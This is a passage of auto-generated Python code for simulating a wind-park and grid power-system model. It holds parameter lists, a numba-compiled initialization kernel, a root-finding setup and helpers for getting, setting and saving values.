self.N_x = 4
self.N_y = 30
self.N_z = 12
self.N_store = 10000
self.params_list = ['S_base', 'g_W1mv_W2mv', 'b_W1mv_W2mv', 'bs_W1mv_W2mv', 'g_W2mv_W3mv', 'b_W2mv_W3mv', 'bs_W2mv_W3mv', 'g_W3mv_POImv', 'b_W3mv_POImv', 'bs_W3mv_POImv', 'g_STmv_POImv', 'b_STmv_POImv', 'bs_STmv_POImv', 'g_POI_GRID', 'b_POI_GRID', 'bs_POI_GRID', 'g_POI_POImv', 'b_POI_POImv', 'bs_POI_POImv', 'g_W1mv_W1lv', 'b_W1mv_W1lv', 'bs_W1mv_W1lv', 'g_W2mv_W2lv', 'b_W2mv_W2lv', 'bs_W2mv_W2lv', 'g_W3mv_W3lv', 'b_W3mv_W3lv', 'bs_W3mv_W3lv', 'g_STmv_STlv', 'b_STmv_STlv', 'bs_STmv_STlv', 'U_W1lv_n', 'U_W2lv_n', 'U_W3lv_n', 'U_STlv_n', 'U_W1mv_n', 'U_W2mv_n', 'U_W3mv_n', 'U_POImv_n', 'U_STmv_n', 'U_POI_n', 'U_GRID_n', 'S_n_GRID', 'Omega_b_GRID', 'K_p_GRID', 'T_p_GRID', 'K_q_GRID', 'T_v_GRID', 'X_v_GRID', 'R_v_GRID', 'K_delta_GRID', 'K_sec_GRID', 'Droop_GRID', 'K_p_agc', 'K_i_agc']
self.params_values_list = [100000000.0, 25.385137099118303, -11.433000678228852, 0.0, 25.385137099118303, -11.433000678228852, 0.0, 25.385137099118303, -11.433000678228852, 0.0, 25.385137099118303, -11.433000678228852, 0.0, 2.7644414300939832, -1.2450537738591219, 0.0, 1.923076923076923, -0.38461538461538464, 0.0, 0.4054054054054054, -0.06756756756756757, 0.0, 0.4054054054054054, -0.06756756756756757, 0.0, 0.4054054054054054, -0.06756756756756757, 0.0, 0.4054054054054054, -0.06756756756756757, 0.0, 690.0, 690.0, 690.0, 690.0, 20000.0, 20000.0, 20000.0, 20000.0, 20000.0, 66000.0, 66000.0, 50000000.0, 314.1592653589793, 0.01, 0.1, 0.01, 0.1, 0.1, 0.01, 0.001, 0.0, 0.05, 0.01, 0.01]
self.inputs_ini_list = ['P_W1lv', 'Q_W1lv', 'P_W2lv', 'Q_W2lv', 'P_W3lv', 'Q_W3lv', 'P_STlv', 'Q_STlv', 'P_W1mv', 'Q_W1mv', 'P_W2mv', 'Q_W2mv', 'P_W3mv', 'Q_W3mv', 'P_POImv', 'Q_POImv', 'P_STmv', 'Q_STmv', 'P_POI', 'Q_POI', 'P_GRID', 'Q_GRID', 'v_ref_GRID', 'p_m_GRID', 'p_c_GRID', 'omega_ref_GRID', 'q_ref_GRID']
self.inputs_ini_values_list = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.1, 1.0, 0.0, 1.0, 0.0]
self.inputs_run_list = ['P_W1lv', 'Q_W1lv', 'P_W2lv', 'Q_W2lv', 'P_W3lv', 'Q_W3lv', 'P_STlv', 'Q_STlv', 'P_W1mv', 'Q_W1mv', 'P_W2mv', 'Q_W2mv', 'P_W3mv', 'Q_W3mv', 'P_POImv', 'Q_POImv', 'P_STmv', 'Q_STmv', 'P_POI', 'Q_POI', 'P_GRID', 'Q_GRID', 'v_ref_GRID', 'p_m_GRID', 'p_c_GRID', 'omega_ref_GRID', 'q_ref_GRID']
self.inputs_run_values_list = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.1, 1.0, 0.0, 1.0, 0.0]
self.outputs_list = ['V_W1lv', 'V_W2lv', 'V_W3lv', 'V_STlv', 'V_W1mv', 'V_W2mv', 'V_W3mv', 'V_POImv', 'V_STmv', 'V_POI', 'V_GRID', 'p_e_GRID']
self.x_list = ['delta_GRID', 'xi_p_GRID', 'e_qv_GRID', 'xi_freq']
self.y_run_list = ['V_W1lv', 'theta_W1lv', 'V_W2lv', 'theta_W2lv', 'V_W3lv', 'theta_W3lv', 'V_STlv', 'theta_STlv', 'V_W1mv', 'theta_W1mv', 'V_W2mv', 'theta_W2mv', 'V_W3mv', 'theta_W3mv', 'V_POImv', 'theta_POImv', 'V_STmv', 'theta_STmv', 'V_POI', 'theta_POI', 'V_GRID', 'theta_GRID', 'omega_GRID', 'i_d_GRID', 'i_q_GRID', 'p_g_GRID', 'q_g_GRID', 'p_m_GRID', 'omega_coi', 'p_agc']
self.xy_list = self.x_list + self.y_run_list
self.y_ini_list = ['V_W1lv', 'theta_W1lv', 'V_W2lv', 'theta_W2lv', 'V_W3lv', 'theta_W3lv', 'V_STlv', 'theta_STlv', 'V_W1mv', 'theta_W1mv', 'V_W2mv', 'theta_W2mv', 'V_W3mv', 'theta_W3mv', 'V_POImv', 'theta_POImv', 'V_STmv', 'theta_STmv', 'V_POI', 'theta_POI', 'V_GRID', 'theta_GRID', 'omega_GRID', 'i_d_GRID', 'i_q_GRID', 'p_g_GRID', 'q_g_GRID', 'p_m_GRID', 'omega_coi', 'p_agc']
self.xy_ini_list = self.x_list + self.y_ini_list
self.t = 0.0
self.it = 0
self.it_store = 0
self.xy_prev = np.zeros((self.N_x+self.N_y,1))
self.initialization_tol = 1e-6
self.N_u = len(self.inputs_run_list)
self.sopt_root_method='hybr'
self.sopt_root_jac=True
self.u_ini_list = self.inputs_ini_list
self.u_ini_values_list = self.inputs_ini_values_list
self.u_run_list = self.inputs_run_list
self.u_run_values_list = self.inputs_run_values_list
self.N_u = len(self.u_run_list)
Fx_ini_rows,Fx_ini_cols,Fy_ini_rows,Fy_ini_cols,Gx_ini_rows,Gx_ini_cols,Gy_ini_rows,Gy_ini_cols = nonzeros()
self.Fx_ini_rows = np.array(Fx_ini_rows)
if len(Fx_ini_rows) == 1:
self.Fx_ini_rows = np.array([[Fx_ini_rows]]).reshape(1,)
self.Fx_ini_cols = np.array([[Fx_ini_cols]]).reshape(1,)
self.Fx_ini_cols = np.array(Fx_ini_cols)
self.Fy_ini_rows = np.array(Fy_ini_rows)
self.Fy_ini_cols = np.array(Fy_ini_cols)
self.Gx_ini_rows = np.array(Gx_ini_rows)
self.Gx_ini_cols = np.array(Gx_ini_cols)
self.Gy_ini_rows = np.array(Gy_ini_rows)
self.Gy_ini_cols = np.array(Gy_ini_cols)
self.yini2urun = list(set(self.inputs_run_list).intersection(set(self.y_ini_list)))
self.uini2yrun = list(set(self.y_run_list).intersection(set(self.inputs_ini_list)))
self.update()
def update(self):
self.N_steps = int(np.ceil(self.t_end/self.Dt))
dt = [
('t_end', np.float64),
('Dt', np.float64),
('decimation', np.float64),
('itol', np.float64),
('Dt_max', np.float64),
('Dt_min', np.float64),
('solvern', np.int64),
('imax', np.int64),
('N_steps', np.int64),
('N_store', np.int64),
('N_x', np.int64),
('N_y', np.int64),
('N_z', np.int64),
('t', np.float64),
('it', np.int64),
('it_store', np.int64),
('idx', np.int64),
('idy', np.int64),
('f', np.float64, (self.N_x,1)),
('x', np.float64, (self.N_x,1)),
('x_0', np.float64, (self.N_x,1)),
('g', np.float64, (self.N_y,1)),
('y_run', np.float64, (self.N_y,1)),
('y_ini', np.float64, (self.N_y,1)),
('u_run', np.float64, (self.N_u,1)),
('y_0', np.float64, (self.N_y,1)),
('h', np.float64, (self.N_z,1)),
('Fx', np.float64, (self.N_x,self.N_x)),
('Fy', np.float64, (self.N_x,self.N_y)),
('Gx', np.float64, (self.N_y,self.N_x)),
('Gy', np.float64, (self.N_y,self.N_y)),
('Fu', np.float64, (self.N_x,self.N_u)),
('Gu', np.float64, (self.N_y,self.N_u)),
('Hx', np.float64, (self.N_z,self.N_x)),
('Hy', np.float64, (self.N_z,self.N_y)),
('Hu', np.float64, (self.N_z,self.N_u)),
('Fx_ini', np.float64, (self.N_x,self.N_x)),
('Fy_ini', np.float64, (self.N_x,self.N_y)),
('Gx_ini', np.float64, (self.N_y,self.N_x)),
('Gy_ini', np.float64, (self.N_y,self.N_y)),
('T', np.float64, (self.N_store+1,1)),
('X', np.float64, (self.N_store+1,self.N_x)),
('Y', np.float64, (self.N_store+1,self.N_y)),
('Z', np.float64, (self.N_store+1,self.N_z)),
('iters', np.float64, (self.N_store+1,1)),
('store', np.int64),
('Fx_ini_rows', np.int64, self.Fx_ini_rows.shape),
('Fx_ini_cols', np.int64, self.Fx_ini_cols.shape),
('Fy_ini_rows', np.int64, self.Fy_ini_rows.shape),
('Fy_ini_cols', np.int64, self.Fy_ini_cols.shape),
('Gx_ini_rows', np.int64, self.Gx_ini_rows.shape),
('Gx_ini_cols', np.int64, self.Gx_ini_cols.shape),
('Gy_ini_rows', np.int64, self.Gy_ini_rows.shape),
('Gy_ini_cols', np.int64, self.Gy_ini_cols.shape),
('Ac_ini', np.float64, ((self.N_x+self.N_y,self.N_x+self.N_y))),
('fg', np.float64, ((self.N_x+self.N_y,1))),
]
values = [
self.t_end,
self.Dt,
self.decimation,
self.itol,
self.Dt_max,
self.Dt_min,
self.solvern,
self.imax,
self.N_steps,
self.N_store,
self.N_x,
self.N_y,
self.N_z,
self.t,
self.it,
self.it_store,
0, # idx
0, # idy
np.zeros((self.N_x,1)), # f
np.zeros((self.N_x,1)), # x
np.zeros((self.N_x,1)), # x_0
np.zeros((self.N_y,1)), # g
np.zeros((self.N_y,1)), # y_run
np.zeros((self.N_y,1)), # y_ini
np.zeros((self.N_u,1)), # u_run
np.zeros((self.N_y,1)), # y_0
np.zeros((self.N_z,1)), # h
np.zeros((self.N_x,self.N_x)), # Fx
np.zeros((self.N_x,self.N_y)), # Fy
np.zeros((self.N_y,self.N_x)), # Gx
np.zeros((self.N_y,self.N_y)), # Fy
np.zeros((self.N_x,self.N_u)), # Fu
np.zeros((self.N_y,self.N_u)), # Gu
np.zeros((self.N_z,self.N_x)), # Hx
np.zeros((self.N_z,self.N_y)), # Hy
np.zeros((self.N_z,self.N_u)), # Hu
np.zeros((self.N_x,self.N_x)), # Fx_ini
np.zeros((self.N_x,self.N_y)), # Fy_ini
np.zeros((self.N_y,self.N_x)), # Gx_ini
np.zeros((self.N_y,self.N_y)), # Fy_ini
np.zeros((self.N_store+1,1)), # T
np.zeros((self.N_store+1,self.N_x)), # X
np.zeros((self.N_store+1,self.N_y)), # Y
np.zeros((self.N_store+1,self.N_z)), # Z
np.zeros((self.N_store+1,1)), # iters
1,
self.Fx_ini_rows,
self.Fx_ini_cols,
self.Fy_ini_rows,
self.Fy_ini_cols,
self.Gx_ini_rows,
self.Gx_ini_cols,
self.Gy_ini_rows,
self.Gy_ini_cols,
np.zeros((self.N_x+self.N_y,self.N_x+self.N_y)),
np.zeros((self.N_x+self.N_y,1)),
]
dt += [(item,np.float64) for item in self.params_list]
values += [item for item in self.params_values_list]
for item_id,item_val in zip(self.inputs_ini_list,self.inputs_ini_values_list):
if item_id in self.inputs_run_list: continue
dt += [(item_id,np.float64)]
values += [item_val]
dt += [(item,np.float64) for item in self.inputs_run_list]
values += [item for item in self.inputs_run_values_list]
self.struct = np.rec.array([tuple(values)], dtype=np.dtype(dt))
xy0 = np.zeros((self.N_x+self.N_y,))
self.ini_dae_jacobian_nn(xy0)
self.run_dae_jacobian_nn(xy0)
def load_params(self,data_input):
if type(data_input) == str:
json_file = data_input
self.json_file = json_file
self.json_data = open(json_file).read().replace("'",'"')
data = json.loads(self.json_data)
elif type(data_input) == dict:
data = data_input
self.data = data
for item in self.data:
self.struct[0][item] = self.data[item]
if item in self.params_list:
self.params_values_list[self.params_list.index(item)] = self.data[item]
elif item in self.inputs_ini_list:
self.inputs_ini_values_list[self.inputs_ini_list.index(item)] = self.data[item]
elif item in self.inputs_run_list:
self.inputs_run_values_list[self.inputs_run_list.index(item)] = self.data[item]
else:
print(f'parameter or input {item} not found')
def save_params(self,file_name = 'parameters.json'):
params_dict = {}
for item in self.params_list:
params_dict.update({item:self.get_value(item)})
params_dict_str = json.dumps(params_dict, indent=4)
with open(file_name,'w') as fobj:
fobj.write(params_dict_str)
def save_inputs_ini(self,file_name = 'inputs_ini.json'):
inputs_ini_dict = {}
for item in self.inputs_ini_list:
inputs_ini_dict.update({item:self.get_value(item)})
inputs_ini_dict_str = json.dumps(inputs_ini_dict, indent=4)
with open(file_name,'w') as fobj:
fobj.write(inputs_ini_dict_str)
def ini_problem(self,x):
self.struct[0].x[:,0] = x[0:self.N_x]
self.struct[0].y_ini[:,0] = x[self.N_x:(self.N_x+self.N_y)]
if self.compile:
ini(self.struct,2)
ini(self.struct,3)
else:
ini.py_func(self.struct,2)
ini.py_func(self.struct,3)
fg = np.vstack((self.struct[0].f,self.struct[0].g))[:,0]
return fg
def run_problem(self,x):
t = self.struct[0].t
self.struct[0].x[:,0] = x[0:self.N_x]
self.struct[0].y_run[:,0] = x[self.N_x:(self.N_x+self.N_y)]
if self.compile:
run(t,self.struct,2)
run(t,self.struct,3)
run(t,self.struct,10)
run(t,self.struct,11)
run(t,self.struct,12)
run(t,self.struct,13)
else:
run.py_func(t,self.struct,2)
run.py_func(t,self.struct,3)
run.py_func(t,self.struct,10)
run.py_func(t,self.struct,11)
run.py_func(t,self.struct,12)
run.py_func(t,self.struct,13)
fg = np.vstack((self.struct[0].f,self.struct[0].g))[:,0]
return fg
def run_dae_jacobian(self,x):
self.struct[0].x[:,0] = x[0:self.N_x]
self.struct[0].y_run[:,0] = x[self.N_x:(self.N_x+self.N_y)]
run(0.0,self.struct,10)
run(0.0,self.struct,11)
run(0.0,self.struct,12)
run(0.0,self.struct,13)
A_c = np.block([[self.struct[0].Fx,self.struct[0].Fy],
[self.struct[0].Gx,self.struct[0].Gy]])
return A_c
def run_dae_jacobian_nn(self,x):
self.struct[0].x[:,0] = x[0:self.N_x]
self.struct[0].y_run[:,0] = x[self.N_x:(self.N_x+self.N_y)]
run_nn(0.0,self.struct,10)
run_nn(0.0,self.struct,11)
run_nn(0.0,self.struct,12)
run_nn(0.0,self.struct,13)
def eval_jacobians(self):
run(0.0,self.struct,10)
run(0.0,self.struct,11)
run(0.0,self.struct,12)
return 1
def ini_dae_jacobian(self,x):
self.struct[0].x[:,0] = x[0:self.N_x]
self.struct[0].y_ini[:,0] = x[self.N_x:(self.N_x+self.N_y)]
if self.compile:
ini(self.struct,10)
ini(self.struct,11)
else:
ini.py_func(self.struct,10)
ini.py_func(self.struct,11)
A_c = np.block([[self.struct[0].Fx_ini,self.struct[0].Fy_ini],
[self.struct[0].Gx_ini,self.struct[0].Gy_ini]])
return A_c
def ini_dae_jacobian_nn(self,x):
self.struct[0].x[:,0] = x[0:self.N_x]
self.struct[0].y_ini[:,0] = x[self.N_x:(self.N_x+self.N_y)]
ini_nn(self.struct,10)
ini_nn(self.struct,11)
def f_ode(self,x):
self.struct[0].x[:,0] = x
run(self.struct,1)
return self.struct[0].f[:,0]
def f_odeint(self,x,t):
self.struct[0].x[:,0] = x
run(self.struct,1)
return self.struct[0].f[:,0]
def f_ivp(self,t,x):
self.struct[0].x[:,0] = x
run(self.struct,1)
return self.struct[0].f[:,0]
def Fx_ode(self,x):
self.struct[0].x[:,0] = x
run(self.struct,10)
return self.struct[0].Fx
def eval_A(self):
Fx = self.struct[0].Fx
Fy = self.struct[0].Fy
Gx = self.struct[0].Gx
Gy = self.struct[0].Gy
A = Fx - Fy @ np.linalg.solve(Gy,Gx)
self.A = A
return A
def eval_A_ini(self):
Fx = self.struct[0].Fx_ini
Fy = self.struct[0].Fy_ini
Gx = self.struct[0].Gx_ini
Gy = self.struct[0].Gy_ini
A = Fx - Fy @ np.linalg.solve(Gy,Gx)
return A
def reset(self):
for param,param_value in zip(self.params_list,self.params_values_list):
self.struct[0][param] = param_value
for input_name,input_value in zip(self.inputs_ini_list,self.inputs_ini_values_list):
self.struct[0][input_name] = input_value
for input_name,input_value in zip(self.inputs_run_list,self.inputs_run_values_list):
self.struct[0][input_name] = input_value
def simulate(self,events,xy0=0):
# initialize both the ini and the run system
self.initialize(events,xy0=xy0)
# simulation run
for event in events:
# make all the desired changes
self.run([event])
# post process
T,X,Y,Z = self.post()
return T,X,Y,Z
def run(self,events):
# simulation run
for event in events:
# make all the desired changes
for item in event:
self.struct[0][item] = event[item]
daesolver(self.struct) # run until next event
return 1
def rtrun(self,events):
# simulation run
for event in events:
# make all the desired changes
for item in event:
self.struct[0][item] = event[item]
self.struct[0].it_store = self.struct[0].N_store-1
daesolver(self.struct) # run until next event
return 1
def post(self):
# post process result
T = self.struct[0]['T'][:self.struct[0].it_store]
X = self.struct[0]['X'][:self.struct[0].it_store,:]
Y = self.struct[0]['Y'][:self.struct[0].it_store,:]
Z = self.struct[0]['Z'][:self.struct[0].it_store,:]
iters = self.struct[0]['iters'][:self.struct[0].it_store,:]
self.T = T
self.X = X
self.Y = Y
self.Z = Z
self.iters = iters
return T,X,Y,Z
def save_0(self,file_name = 'xy_0.json'):
xy_0_dict = {}
for item in self.x_list:
xy_0_dict.update({item:self.get_value(item)})
for item in self.y_ini_list:
xy_0_dict.update({item:self.get_value(item)})
xy_0_str = json.dumps(xy_0_dict, indent=4)
with open(file_name,'w') as fobj:
fobj.write(xy_0_str)
def load_0(self,file_name = 'xy_0.json'):
with open(file_name) as fobj:
xy_0_str = fobj.read()
xy_0_dict = json.loads(xy_0_str)
for item in xy_0_dict:
if item in self.x_list:
self.xy_prev[self.x_list.index(item)] = xy_0_dict[item]
if item in self.y_ini_list:
self.xy_prev[self.y_ini_list.index(item)+self.N_x] = xy_0_dict[item]
def initialize(self,events=[{}],xy0=0,compile=True):
'''
Parameters
----------
events : dictionary
Dictionary with at least 't_end' and all inputs and parameters
that need to be changed.
xy0 : float or string, optional
0 means all states should be zero as initial guess.
If not zero all the states initial guess are the given input.
If 'prev' it uses the last known initialization result as initial guess.
Returns
-------
T : TYPE
DESCRIPTION.
X : TYPE
DESCRIPTION.
Y : TYPE
DESCRIPTION.
Z : TYPE
DESCRIPTION.
'''
self.compile = compile
# simulation parameters
self.struct[0].it = 0 # set time step to zero
self.struct[0].it_store = 0 # set storage to zero
self.struct[0].t = 0.0 # set time to zero
# initialization
it_event = 0
event = events[it_event]
for item in event:
self.struct[0][item] = event[item]
## compute initial conditions using x and y_ini
if type(xy0) == str:
if xy0 == 'prev':
xy0 = self.xy_prev
else:
self.load_0(xy0)
xy0 = self.xy_prev
elif type(xy0) == dict:
with open('xy_0.json','w') as fobj:
fobj.write(json.dumps(xy0))
self.load_0('xy_0.json')
xy0 = self.xy_prev
else:
if xy0 == 0:
xy0 = np.zeros(self.N_x+self.N_y)
elif xy0 == 1:
xy0 = np.ones(self.N_x+self.N_y)
else:
xy0 = xy0*np.ones(self.N_x+self.N_y)
#xy = sopt.fsolve(self.ini_problem,xy0, jac=self.ini_dae_jacobian )
if self.sopt_root_jac:
sol = sopt.root(self.ini_problem, xy0,
jac=self.ini_dae_jacobian,
method=self.sopt_root_method, tol=self.initialization_tol)
else:
sol = sopt.root(self.ini_problem, xy0, method=self.sopt_root_method)
self.initialization_ok = True
if sol.success == False:
print('initialization not found!')
self.initialization_ok = False
T = self.struct[0]['T'][:self.struct[0].it_store]
X = self.struct[0]['X'][:self.struct[0].it_store,:]
Y = self.struct[0]['Y'][:self.struct[0].it_store,:]
Z = self.struct[0]['Z'][:self.struct[0].it_store,:]
iters = self.struct[0]['iters'][:self.struct[0].it_store,:]
if self.initialization_ok:
xy = sol.x
self.xy_prev = xy
self.struct[0].x[:,0] = xy[0:self.N_x]
self.struct[0].y_run[:,0] = xy[self.N_x:]
## y_ini to u_run
for item in self.inputs_run_list:
if item in self.y_ini_list:
self.struct[0][item] = self.struct[0].y_ini[self.y_ini_list.index(item)]
## u_ini to y_run
for item in self.inputs_ini_list:
if item in self.y_run_list:
self.struct[0].y_run[self.y_run_list.index(item)] = self.struct[0][item]
#xy = sopt.fsolve(self.ini_problem,xy0, jac=self.ini_dae_jacobian )
if self.sopt_root_jac:
sol = sopt.root(self.run_problem, xy0,
jac=self.run_dae_jacobian,
method=self.sopt_root_method, tol=self.initialization_tol)
else:
sol = sopt.root(self.run_problem, xy0, method=self.sopt_root_method)
if self.compile:
# evaluate f and g
run(0.0,self.struct,2)
run(0.0,self.struct,3)
# evaluate run jacobians
run(0.0,self.struct,10)
run(0.0,self.struct,11)
run(0.0,self.struct,12)
run(0.0,self.struct,14)
else:
# evaluate f and g
run.py_func(0.0,self.struct,2)
run.py_func(0.0,self.struct,3)
# evaluate run jacobians
run.py_func(0.0,self.struct,10)
run.py_func(0.0,self.struct,11)
run.py_func(0.0,self.struct,12)
run.py_func(0.0,self.struct,14)
# post process result
T = self.struct[0]['T'][:self.struct[0].it_store]
X = self.struct[0]['X'][:self.struct[0].it_store,:]
Y = self.struct[0]['Y'][:self.struct[0].it_store,:]
Z = self.struct[0]['Z'][:self.struct[0].it_store,:]
iters = self.struct[0]['iters'][:self.struct[0].it_store,:]
self.T = T
self.X = X
self.Y = Y
self.Z = Z
self.iters = iters
return self.initialization_ok
def get_value(self,name):
if name in self.inputs_run_list:
value = self.struct[0][name]
if name in self.x_list:
idx = self.x_list.index(name)
value = self.struct[0].x[idx,0]
if name in self.y_run_list:
idy = self.y_run_list.index(name)
value = self.struct[0].y_run[idy,0]
if name in self.params_list:
value = self.struct[0][name]
if name in self.outputs_list:
value = self.struct[0].h[self.outputs_list.index(name),0]
return value
def get_values(self,name):
if name in self.x_list:
values = self.X[:,self.x_list.index(name)]
if name in self.y_run_list:
values = self.Y[:,self.y_run_list.index(name)]
if name in self.outputs_list:
values = self.Z[:,self.outputs_list.index(name)]
return values
def get_mvalue(self,names):
'''
Parameters
----------
names : list
list of variables names to return each value.
Returns
-------
mvalue : TYPE
list of value of each variable.
'''
mvalue = []
for name in names:
mvalue += [self.get_value(name)]
return mvalue
def set_value(self,name_,value):
if name_ in self.inputs_run_list:
self.struct[0][name_] = value
return
elif name_ in self.params_list:
self.struct[0][name_] = value
return
elif name_ in self.inputs_ini_list:
self.struct[0][name_] = value
return
else:
print(f'Input or parameter {name_} not found.')
def set_values(self,dictionary):
for item in dictionary:
self.set_value(item,dictionary[item])
def report_x(self,value_format='5.2f', decimals=2):
for item in self.x_list:
print(f'{item:5s} = {self.get_value(item):5.{decimals}f}')
def report_y(self,value_format='5.2f', decimals=2):
for item in self.y_run_list:
print(f'{item:5s} = {self.get_value(item):5.{decimals}f}')
def report_u(self,value_format='5.2f', decimals=2):
for item in self.inputs_run_list:
print(f'{item:5s} = {self.get_value(item):5.{decimals}f}')
def report_z(self,value_format='5.2f', decimals=2):
for item in self.outputs_list:
print(f'{item:5s} = {self.get_value(item):5.{decimals}f}')
def report_params(self,value_format='5.2f', decimals=2):
for item in self.params_list:
print(f'{item:5s} = {self.get_value(item):5.{decimals}f}')
def get_x(self):
return self.struct[0].x
def ss(self):
ssate(self.struct,self.xy_prev.reshape(len(self.xy_prev),1))
## y_ini to y_run
self.struct[0].y_run = self.struct[0].y_ini
## y_ini to u_run
for item in self.yini2urun:
self.struct[0][item] = self.struct[0].y_ini[self.y_ini_list.index(item)]
## u_ini to y_run
for item in self.uini2yrun:
self.struct[0].y_run[self.y_run_list.index(item)] = self.struct[0][item]
@numba.njit(cache=True)
def ini(struct,mode):
    '''Evaluate the initialization-problem equations of the generated model.

    Machine-generated numba kernel. Depending on ``mode`` it writes different
    arrays of ``struct[0]`` in place and returns nothing:

    - ``mode == 2``: differential residuals ``f``.
    - ``mode == 3``: algebraic residuals ``g`` and outputs ``h``.
    - ``mode == 10``: entries of ``Fx_ini`` (df/dx, consistent with the
      expressions below).
    - ``mode == 11``: entries of ``Fy_ini`` (df/dy), ``Gx_ini`` (dg/dx) and
      ``Gy_ini`` (dg/dy).

    Parameters
    ----------
    struct : numpy structured array
        Model container holding parameters, inputs, dynamic states ``x``,
        initialization algebraic states ``y_ini`` and the residual/jacobian
        arrays written here.
    mode : int
        Selects which block of equations to evaluate (see above).
    '''
    # Parameters:
    S_base = struct[0].S_base
    g_W1mv_W2mv = struct[0].g_W1mv_W2mv
    b_W1mv_W2mv = struct[0].b_W1mv_W2mv
    bs_W1mv_W2mv = struct[0].bs_W1mv_W2mv
    g_W2mv_W3mv = struct[0].g_W2mv_W3mv
    b_W2mv_W3mv = struct[0].b_W2mv_W3mv
    bs_W2mv_W3mv = struct[0].bs_W2mv_W3mv
    g_W3mv_POImv = struct[0].g_W3mv_POImv
    b_W3mv_POImv = struct[0].b_W3mv_POImv
    bs_W3mv_POImv = struct[0].bs_W3mv_POImv
    g_STmv_POImv = struct[0].g_STmv_POImv
    b_STmv_POImv = struct[0].b_STmv_POImv
    bs_STmv_POImv = struct[0].bs_STmv_POImv
    g_POI_GRID = struct[0].g_POI_GRID
    b_POI_GRID = struct[0].b_POI_GRID
    bs_POI_GRID = struct[0].bs_POI_GRID
    g_POI_POImv = struct[0].g_POI_POImv
    b_POI_POImv = struct[0].b_POI_POImv
    bs_POI_POImv = struct[0].bs_POI_POImv
    g_W1mv_W1lv = struct[0].g_W1mv_W1lv
    b_W1mv_W1lv = struct[0].b_W1mv_W1lv
    bs_W1mv_W1lv = struct[0].bs_W1mv_W1lv
    g_W2mv_W2lv = struct[0].g_W2mv_W2lv
    b_W2mv_W2lv = struct[0].b_W2mv_W2lv
    bs_W2mv_W2lv = struct[0].bs_W2mv_W2lv
    g_W3mv_W3lv = struct[0].g_W3mv_W3lv
    b_W3mv_W3lv = struct[0].b_W3mv_W3lv
    bs_W3mv_W3lv = struct[0].bs_W3mv_W3lv
    g_STmv_STlv = struct[0].g_STmv_STlv
    b_STmv_STlv = struct[0].b_STmv_STlv
    bs_STmv_STlv = struct[0].bs_STmv_STlv
    U_W1lv_n = struct[0].U_W1lv_n
    U_W2lv_n = struct[0].U_W2lv_n
    U_W3lv_n = struct[0].U_W3lv_n
    U_STlv_n = struct[0].U_STlv_n
    U_W1mv_n = struct[0].U_W1mv_n
    U_W2mv_n = struct[0].U_W2mv_n
    U_W3mv_n = struct[0].U_W3mv_n
    U_POImv_n = struct[0].U_POImv_n
    U_STmv_n = struct[0].U_STmv_n
    U_POI_n = struct[0].U_POI_n
    U_GRID_n = struct[0].U_GRID_n
    S_n_GRID = struct[0].S_n_GRID
    Omega_b_GRID = struct[0].Omega_b_GRID
    K_p_GRID = struct[0].K_p_GRID
    T_p_GRID = struct[0].T_p_GRID
    K_q_GRID = struct[0].K_q_GRID
    T_v_GRID = struct[0].T_v_GRID
    X_v_GRID = struct[0].X_v_GRID
    R_v_GRID = struct[0].R_v_GRID
    K_delta_GRID = struct[0].K_delta_GRID
    K_sec_GRID = struct[0].K_sec_GRID
    Droop_GRID = struct[0].Droop_GRID
    K_p_agc = struct[0].K_p_agc
    K_i_agc = struct[0].K_i_agc
    # Inputs:
    P_W1lv = struct[0].P_W1lv
    Q_W1lv = struct[0].Q_W1lv
    P_W2lv = struct[0].P_W2lv
    Q_W2lv = struct[0].Q_W2lv
    P_W3lv = struct[0].P_W3lv
    Q_W3lv = struct[0].Q_W3lv
    P_STlv = struct[0].P_STlv
    Q_STlv = struct[0].Q_STlv
    P_W1mv = struct[0].P_W1mv
    Q_W1mv = struct[0].Q_W1mv
    P_W2mv = struct[0].P_W2mv
    Q_W2mv = struct[0].Q_W2mv
    P_W3mv = struct[0].P_W3mv
    Q_W3mv = struct[0].Q_W3mv
    P_POImv = struct[0].P_POImv
    Q_POImv = struct[0].Q_POImv
    P_STmv = struct[0].P_STmv
    Q_STmv = struct[0].Q_STmv
    P_POI = struct[0].P_POI
    Q_POI = struct[0].Q_POI
    P_GRID = struct[0].P_GRID
    Q_GRID = struct[0].Q_GRID
    v_ref_GRID = struct[0].v_ref_GRID
    p_m_GRID = struct[0].p_m_GRID
    p_c_GRID = struct[0].p_c_GRID
    omega_ref_GRID = struct[0].omega_ref_GRID
    q_ref_GRID = struct[0].q_ref_GRID
    # Dynamical states:
    delta_GRID = struct[0].x[0,0]
    xi_p_GRID = struct[0].x[1,0]
    e_qv_GRID = struct[0].x[2,0]
    xi_freq = struct[0].x[3,0]
    # Algebraic states:
    V_W1lv = struct[0].y_ini[0,0]
    theta_W1lv = struct[0].y_ini[1,0]
    V_W2lv = struct[0].y_ini[2,0]
    theta_W2lv = struct[0].y_ini[3,0]
    V_W3lv = struct[0].y_ini[4,0]
    theta_W3lv = struct[0].y_ini[5,0]
    V_STlv = struct[0].y_ini[6,0]
    theta_STlv = struct[0].y_ini[7,0]
    V_W1mv = struct[0].y_ini[8,0]
    theta_W1mv = struct[0].y_ini[9,0]
    V_W2mv = struct[0].y_ini[10,0]
    theta_W2mv = struct[0].y_ini[11,0]
    V_W3mv = struct[0].y_ini[12,0]
    theta_W3mv = struct[0].y_ini[13,0]
    V_POImv = struct[0].y_ini[14,0]
    theta_POImv = struct[0].y_ini[15,0]
    V_STmv = struct[0].y_ini[16,0]
    theta_STmv = struct[0].y_ini[17,0]
    V_POI = struct[0].y_ini[18,0]
    theta_POI = struct[0].y_ini[19,0]
    V_GRID = struct[0].y_ini[20,0]
    theta_GRID = struct[0].y_ini[21,0]
    omega_GRID = struct[0].y_ini[22,0]
    i_d_GRID = struct[0].y_ini[23,0]
    i_q_GRID = struct[0].y_ini[24,0]
    p_g_GRID = struct[0].y_ini[25,0]
    q_g_GRID = struct[0].y_ini[26,0]
    # NOTE(review): this rebinding overwrites the p_m_GRID input read above
    # with the algebraic state y_ini[27]; the equations below therefore use
    # the state value, not the input.
    p_m_GRID = struct[0].y_ini[27,0]
    omega_coi = struct[0].y_ini[28,0]
    p_agc = struct[0].y_ini[29,0]
    # Differential equations:
    if mode == 2:
